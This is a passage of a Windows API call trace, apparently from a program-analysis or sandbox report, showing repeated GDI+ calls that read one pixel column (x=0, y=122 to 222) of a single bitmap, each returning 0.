[0152.861] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=122, color=0x19eed4) returned 0x0
[0152.861] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.861] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.861] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=123, color=0x19eed4) returned 0x0
[0152.862] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.862] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.862] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=124, color=0x19eed4) returned 0x0
[0152.862] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.862] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.862] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=125, color=0x19eed4) returned 0x0
[0152.862] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.862] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.862] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=126, color=0x19eed4) returned 0x0
[0152.862] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.862] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.862] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=127, color=0x19eed4) returned 0x0
[0152.862] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.862] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.862] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=128, color=0x19eed4) returned 0x0
[0152.862] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.862] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.862] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=129, color=0x19eed4) returned 0x0
[0152.862] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.862] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.863] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=130, color=0x19eed4) returned 0x0
[0152.863] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.863] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.863] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=131, color=0x19eed4) returned 0x0
[0152.863] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.863] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.863] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=132, color=0x19eed4) returned 0x0
[0152.863] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.863] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.863] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=133, color=0x19eed4) returned 0x0
[0152.863] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.863] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.863] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=134, color=0x19eed4) returned 0x0
[0152.863] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.863] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.863] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=135, color=0x19eed4) returned 0x0
[0152.863] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.863] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.863] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=136, color=0x19eed4) returned 0x0
[0152.863] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.863] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.863] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=137, color=0x19eed4) returned 0x0
[0152.863] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.863] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.863] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=138, color=0x19eed4) returned 0x0
[0152.864] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.864] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.864] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=139, color=0x19eed4) returned 0x0
[0152.864] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.864] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.864] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=140, color=0x19eed4) returned 0x0
[0152.864] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.864] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.864] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=141, color=0x19eed4) returned 0x0
[0152.864] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.864] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.864] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=142, color=0x19eed4) returned 0x0
[0152.864] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.864] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.864] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=143, color=0x19eed4) returned 0x0
[0152.864] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.864] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.864] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=144, color=0x19eed4) returned 0x0
[0152.864] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.864] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.864] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=145, color=0x19eed4) returned 0x0
[0152.864] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.864] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.864] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=146, color=0x19eed4) returned 0x0
[0152.865] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.865] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.865] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=147, color=0x19eed4) returned 0x0
[0152.865] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.865] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.865] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=148, color=0x19eed4) returned 0x0
[0152.865] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.865] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.865] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=149, color=0x19eed4) returned 0x0
[0152.865] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.865] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.865] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=150, color=0x19eed4) returned 0x0
[0152.865] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.865] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.865] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=151, color=0x19eed4) returned 0x0
[0152.865] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.865] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.865] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=152, color=0x19eed4) returned 0x0
[0152.865] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.865] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.865] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=153, color=0x19eed4) returned 0x0
[0152.865] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.865] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.865] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=154, color=0x19eed4) returned 0x0
[0152.866] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.866] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.866] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=155, color=0x19eed4) returned 0x0
[0152.866] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.866] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.866] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=156, color=0x19eed4) returned 0x0
[0152.866] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.866] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.866] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=157, color=0x19eed4) returned 0x0
[0152.866] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.866] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.866] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=158, color=0x19eed4) returned 0x0
[0152.866] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.866] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.866] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=159, color=0x19eed4) returned 0x0
[0152.866] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.866] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.866] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=160, color=0x19eed4) returned 0x0
[0152.866] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.866] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.866] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=161, color=0x19eed4) returned 0x0
[0152.866] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.866] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.866] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=162, color=0x19eed4) returned 0x0
[0152.866] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.867] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.867] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=163, color=0x19eed4) returned 0x0
[0152.867] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.867] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.867] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=164, color=0x19eed4) returned 0x0
[0152.867] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.867] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.867] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=165, color=0x19eed4) returned 0x0
[0152.867] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.867] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.867] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=166, color=0x19eed4) returned 0x0
[0152.867] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.867] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.867] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=167, color=0x19eed4) returned 0x0
[0152.867] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.867] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.867] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=168, color=0x19eed4) returned 0x0
[0152.867] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.867] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.867] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=169, color=0x19eed4) returned 0x0
[0152.867] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.867] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.867] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=170, color=0x19eed4) returned 0x0
[0152.868] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.868] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.868] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=171, color=0x19eed4) returned 0x0
[0152.868] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.868] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.868] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=172, color=0x19eed4) returned 0x0
[0152.868] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.868] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.868] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=173, color=0x19eed4) returned 0x0
[0152.868] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.868] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.868] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=174, color=0x19eed4) returned 0x0
[0152.868] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.868] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.868] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=175, color=0x19eed4) returned 0x0
[0152.868] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.868] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.868] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=176, color=0x19eed4) returned 0x0
[0152.868] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.868] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.868] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=177, color=0x19eed4) returned 0x0
[0152.869] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.869] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.869] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=178, color=0x19eed4) returned 0x0
[0152.869] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.869] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.869] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=179, color=0x19eed4) returned 0x0
[0152.869] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.869] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.869] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=180, color=0x19eed4) returned 0x0
[0152.869] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.869] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.869] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=181, color=0x19eed4) returned 0x0
[0152.869] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.869] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.869] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=182, color=0x19eed4) returned 0x0
[0152.869] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.869] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.869] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=183, color=0x19eed4) returned 0x0
[0152.869] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.869] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.869] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=184, color=0x19eed4) returned 0x0
[0152.869] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.869] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.870] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=185, color=0x19eed4) returned 0x0
[0152.870] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.870] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.870] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=186, color=0x19eed4) returned 0x0
[0152.870] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.870] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.870] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=187, color=0x19eed4) returned 0x0
[0152.870] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.870] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.870] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=188, color=0x19eed4) returned 0x0
[0152.870] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.870] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.870] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=189, color=0x19eed4) returned 0x0
[0152.870] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.870] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.870] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=190, color=0x19eed4) returned 0x0
[0152.870] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.870] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.870] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=191, color=0x19eed4) returned 0x0
[0152.870] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.870] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.870] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=192, color=0x19eed4) returned 0x0
[0152.870] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.870] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.871] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=193, color=0x19eed4) returned 0x0
[0152.871] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.871] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.871] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=194, color=0x19eed4) returned 0x0
[0152.871] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.871] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.871] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=195, color=0x19eed4) returned 0x0
[0152.871] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.871] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.871] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=196, color=0x19eed4) returned 0x0
[0152.871] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.871] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.871] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=197, color=0x19eed4) returned 0x0
[0152.871] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.871] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.871] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=198, color=0x19eed4) returned 0x0
[0152.871] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.871] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.872] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=199, color=0x19eed4) returned 0x0
[0152.872] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.872] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.872] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=200, color=0x19eed4) returned 0x0
[0152.872] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.872] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.872] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=201, color=0x19eed4) returned 0x0
[0152.872] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.872] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.872] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=202, color=0x19eed4) returned 0x0
[0152.872] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.872] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.872] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=203, color=0x19eed4) returned 0x0
[0152.872] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.872] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.872] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=204, color=0x19eed4) returned 0x0
[0152.872] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.872] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.872] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=205, color=0x19eed4) returned 0x0
[0152.872] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.872] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.872] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=206, color=0x19eed4) returned 0x0
[0152.872] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.873] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.873] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=207, color=0x19eed4) returned 0x0
[0152.873] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.873] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.873] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=208, color=0x19eed4) returned 0x0
[0152.873] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.873] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.873] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=209, color=0x19eed4) returned 0x0
[0152.873] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.873] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.873] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=210, color=0x19eed4) returned 0x0
[0152.873] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.873] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.873] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=211, color=0x19eed4) returned 0x0
[0152.873] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.873] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.873] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=212, color=0x19eed4) returned 0x0
[0152.873] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.873] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.873] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=213, color=0x19eed4) returned 0x0
[0152.873] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.873] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.873] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=214, color=0x19eed4) returned 0x0
[0152.873] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.873] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.874] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=215, color=0x19eed4) returned 0x0
[0152.874] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.874] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.874] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=216, color=0x19eed4) returned 0x0
[0152.874] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.874] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.874] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=217, color=0x19eed4) returned 0x0
[0152.874] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.874] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.874] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=218, color=0x19eed4) returned 0x0
[0152.874] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.874] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.874] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=219, color=0x19eed4) returned 0x0
[0152.874] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.874] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.874] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=220, color=0x19eed4) returned 0x0
[0152.874] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.874] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.874] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=221, color=0x19eed4) returned 0x0
[0152.874] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.874] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
[0152.874] GdipBitmapGetPixel (bitmap=0x5c7f3b8, x=0, y=222, color=0x19eed4) returned 0x0
[0152.874] GdipGetImageWidth (image=0x5c7f3b8, width=0x19eec4) returned 0x0
[0152.874] GdipGetImageHeight (image=0x5c7f3b8, height=0x19eec4) returned 0x0
